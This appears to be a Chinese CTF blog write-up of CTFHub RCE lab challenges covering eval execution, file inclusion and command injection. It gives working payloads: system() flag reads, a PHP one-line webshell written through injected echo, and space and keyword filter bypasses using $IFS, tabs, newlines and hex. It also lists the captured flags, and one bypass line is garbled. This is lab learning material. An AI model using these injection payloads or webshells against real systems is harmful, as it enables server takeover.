第四周 ctfhub

最新推荐文章于 2024-04-11 20:05:26 发布
最新推荐文章于 2024-04-11 20:05:26 发布
阅读量288 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/114437791
版权

RCE

eval执行:

首先打开环境:
在这里插入图片描述
根据资料知道:
eval会把字符串当作php语言执行

所以:
执行:/?cmd=system(“ls …/”);

在这里插入图片描述
没有发现什么,在进行下返回上一目录:
在这里插入图片描述
没有发现什么,在进行下返回上一目录:
在这里插入图片描述
发现flag文件 cat它
/?cmd=system(“cat%20…/…/…/flag_2808”);
得到flag:
在这里插入图片描述
flag:
ctfhub{28beee06fe9f20d338cc83f4}

文件包含

:

根据题目可知到:
在这里插入图片描述
点开shell
在这里插入图片描述

Strops 查找字符串在字符串中第一次出现的位置:
所以可以构造一下file=shell.txt,
再往ctfhub里传参:
在这里插入图片描述

、没有发现flag
还是像上一题一样,一级一级的找
最后使用cat命令查看falg

在这里插入图片描述

php://input:

首先查看题目得到:
在这里插入图片描述
这题代码限制只能使用php开头的伪协议
查看phpinfo
在这里插入图片描述

所以利用burpsuit请求更改:
在这里插入图片描述
cat flag_12322 得到flag:
在这里插入图片描述
ctfhub{843d95072b099ef4b3aafddc}

远程包含:

此题同上题用burpsuit:
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
获得flag

读取源代码:

在这里插入图片描述
除了上一种没有想到什么别的思路,所以到网上查一下发现可以使用php伪协议中的filter协议
在这里插入图片描述
构造一下
在这里插入图片描述
得到flag

文件包含:

命令注入-无过滤:

在这里插入图片描述

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $cmd = "ping -c 4 {$_GET['ip']}";
    exec($cmd, $res);
}

?>

<!DOCTYPE html>
<html>
<head>
    <title>CTFHub 命令注入-无过滤</title>
</head>
<body>

<h1>CTFHub 命令注入-无过滤</h1>

<form action="#" method="GET">
    <label for="ip">IP : </label><br>
    <input type="text" id="ip" name="ip">
    <input type="submit" value="Ping">
</form>

<hr>

<pre>
<?php
if ($res) {
    print_r($res);
}
?>
</pre>

<?php
show_source(__FILE__);
?>

</body>
</html>

因为题目没有过滤,所以直接拼接就行了
输入127.0.0.1;ls,得到
在这里插入图片描述
发现有一个php文件
Cat查看
在这里插入图片描述
发现没有显示出来,猜测可能是编码的原因
在后面加上| base64
即可转换为base64编码输出,然后再解码得到flag
PD9waHAgLy8gY3RmaHViezY2NjJmMTYwNWJhOTcyMGUwYmVlZWZlY30K
在这里插入图片描述
也可拼接上传一句话木马,然后通过蚁剑链接,也能得到flag
127.0.0.1&echo"<?php @eval($_POST['1']);?>">1.php
但是蚁剑链接不上,经过查询,发现要修改成
127.0.0.1&echo -e “<?php @eval(\$_POST['1']);?>” > 1.php
echo命令会调用$_POST导致原始文件中没有

命令注入-过滤cat:

本题过滤掉了cat命令
可以使用连接符或者反斜杠来绕过,例如:ca\t,ca“t
其余步骤与上题一致
在这里插入图片描述
解码得到flag
也可使用蚁剑

命令注入-过滤空格:

在 bash 下, 可以用以下字符代替空格:<,<>,%20(space),%09(tab),$IFS$9, I F S , {IFS}, IFS,IFS 等
所以将空格替换即可得到flag

命令注入-过滤目录分隔符:

因为过滤了目录分隔符/
所以要切换到相应的目录才能cat到有flag的文件

在这里插入图片描述
先使用ls发先还包含了一个文件夹
Cd切换到那个文件夹
在这里插入图片描述
发现了php文件
还是像之前一样,cat出来

命令注入-过滤运算符:

在这里插入图片描述
发现过滤掉了很多运算符,但是;并没有过滤
所以可以照常使用

命令注入-综合练习:

通过查看源代码

在这里插入图片描述
发现过滤掉了很多东西,这时就可以对照表上的进行替换
在这里插入图片描述
在这里插入图片描述不知道怎么,在命令框中输入/?ip=127.0.0.1%0als#没有作用
所以在url里修改

在这里插入图片描述
因为flag也被过滤掉了
所以可以使用tab补全
也可以转换成16进制字符串绕过
发现空格替换为%20也不行
所以替换成 I F S 构 造 成 / ? i p = 127.0.0.1 {IFS} 构造成 /?ip=127.0.0.1%0aca''t IFS/?ip=127.0.0.1{IFS} ( p r i n t f (printf (printf{IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x66\x6c\x61\x67\x5f\x32\x38\x34\x30\x37\x32\x35\x32\x36\x31\x33\x30\x39\x37\x2e\x70\x68\x70 ")
或者/?ip=127.0.0.1%0acd%09*_is_here%0aca%5ct%09*_28407252613097.php
即可得到flag

南冥~
关注
暑期CTF练习——第四周
AlienEowynWan的博客
07-31 233
攻防世界reverse进阶区notsequence 其实这题在我做完逆向题目最基本的操作后就卡死了,数学渣渣在此膜拜杨辉,没看到wp之前实在想不到这是个验证杨辉三角的算法…… 查壳,找main函数之类的都省略吧,我们看到main函数生成的伪代码 可以看到有两个check,执行完后判断个什么20次再转换MD5即可得到flag 先看下这两个check上的函数吧 sub_80486CD 这个是验证杨辉三角的某条定理:第n行数字的和为2^(n-1) 第14行就是表示验证2^v5==v3 sub_8048783
ctfhub 命令注入
最新发布
a666666688的博客
08-05 458
因为过滤了分割符,所以flag_is_here文件夹下的文件不能直接读取。若要在表单提交处修改则需要注意,提交后删除url中的25后即可执行。如果包含了这些被禁止的字符,就将匹配结果存储在。如果不包含这些字符,就构建一个。参数,会进行进一步的正则表达式匹配检查。这段代码的主要目的是根据用户通过。函数执行,将结果存储在。注意本体在url上修改即可。参数执行相应的操作。
CTFHUB POST
山兔的博客
09-12 817
一、POST 这次是发一个HTTP POST请求。对了.ssrf是用php的curl实现的,并且会跟踪302跳转.加油吧骚年。 1.什么是gopher协议 Gopher是Internet上一个信息查找系统,它将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具。使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher协议支持发出GET、POST请求
Ctfhub-POST请求
鸣蜩十四的博客
08-09 3354
在题目中的环境初始链接为:http://challenge-fc6097d3c4b542ee.sandbox.ctfhub.com:10800/?url=_ 我们先用file://协议对index.php页面源码进行读取,http://challenge-fc6097d3c4b542ee.sandbox.ctfhub.com:10800/?url=file:///var/www/html/index.php,然后发现有一个/flag.php的页面,然后同样对其源码进行读取 得到index.php的页面源码如
CTFHUB-POST请求
Dug123456_的博客
04-11 1037
定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议的请求。
CTFHub技能树
weixin_59480274的博客
04-23 5397
文章目录一、CTF基础知识1、CTF简介2、竞赛二、使用步骤1.引入库2.读入数据总结 一、CTF基础知识 1、CTF简介 开启题目 2、竞赛 开启题目 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ss
CTFHub-Web--信息泄露
m0_69003772的博客
04-23 1435
CTF简介以及信息泄露下题目解题过程 文章目录 前言 一、基础知识 1.CTF简介 2.竞赛模式 2.1.理论知识 2.2.Jeopardy-解题 2.3.AwD-攻防模式 2.4.AWP-攻防增强 2.5.RHG-自动化[ AI自动化] 2.6RW-真实世界 2.7.KoH-抢占山头 2.8.Mix[混合] 3.比赛形式 3.1.线上 3.2.线下 4.题目类型 4.1.Web 4.2.Pwn 4.3.Reverse 4.4.C.
第二周任务[GKCTF2020]
Lumos427的博客
03-26 628
[GKCTF2020]cve版签到 刚看是啥也不会,去百度了一下这题,发现这是一个ssrf漏洞(服务端请求伪造) 下面是在网上找到的介绍 漏洞详情 PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存
CTF基础知识
m0_65849838的博客
04-26 6325
文章目录一. CTF简介1.开启题目并点击题目附件2.得到正文和flag①正文②FLAG二.竞赛模式1.开启题目并点击题目附件2.正文和flag①正文理论知识Jeopardy-解题AwD-攻防模式AWP-攻防增强RHG-自动化[ AI自动化]RW-真实世界KoH-抢占山头Mix[混合]②flag三.比赛形式1.开启题目并点击题目附件2.正文和flag①正文线上线下②flag四.题目1.开启题目并点击题目附件二.正文和flag①正文WebPwnReverseCryptoMisc②flag 一. CTF简介 1
CTF的第一次了解
qq_73684425的博客
10-13 2085
CTF 一、CTF的定义:CTF是什么? CTF 是 Capture The Flag 的简称,中文译作夺旗赛,其本意是西方的一种传统运动。在比赛上两军会互相争夺旗帜,当有一方的旗帜被敌军夺取,就代表了那一方的战败。在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。在比赛中,选手们的任务往往是在获取服务器后寻找指定的字段,或者文件中某一个固定格式的字段,这个字段叫做 flag,其形式一般为 flag{xxxxxxxx},提交到裁判机就即可得分。 二、CTF的起源。 CTF
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1442
ctfhub ssrf post小记
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 2991
SSRF相关题目实战
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 8718
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2375
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
ctfhub平台rce练手
New_Ss_的博客
02-02 297
远程代码执行eval 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,如果没有进行周全的过滤,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞 远程代码执行eval 一、 (来自ctfhub) 经过代码审计可以看到没有经过任何的过滤,就将“cmd”的内容进行eval执行。我们可以经过对c
第十四天命令执行绕过练习题
代码审计
03-21 382
第一题 //1. 读取同目录下的bihuo.txt 文件的内容 linux环境下自己创建bihuo.txt <?php error_reporting(0);#屏蔽错误 if(isset($_GET['c'])) { $c = $_GET['c']; if(!preg_match('/bihuo/i', $c)) { #过滤bihuo关键字 eval($c);#代码执行 } } else { highlight_file(__FILE__); } ?&g
CTFhub-RCE漏洞详解
qq_49422880的博客
05-19 2607
CTFHUB-RCE漏洞详解(一)一、eval执行二、文件包含三、php://input   RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)是互联网的一种安全漏洞。   它可以让攻击者直接向后台服务器远程注入操作系统命令,相当于直接操控服务器电脑的cmd命令行!从而操控后台系统,高危漏洞!   RCE漏洞产生的根本原因:服务器像php环境版本对可执行变量函数没有做过滤,导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。 一、eval执行
ctfhub请求申请
10-09
4. 确认您已阅读并同意CTFHub的用户协议和隐私政策。 5. 完成注册过程后,您将收到一封确认电子邮件。请按照电子邮件中的说明进行验证。 6. 验证完成后,您可以使用您的注册凭据登录CTFHub。 如果您在申请过程中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值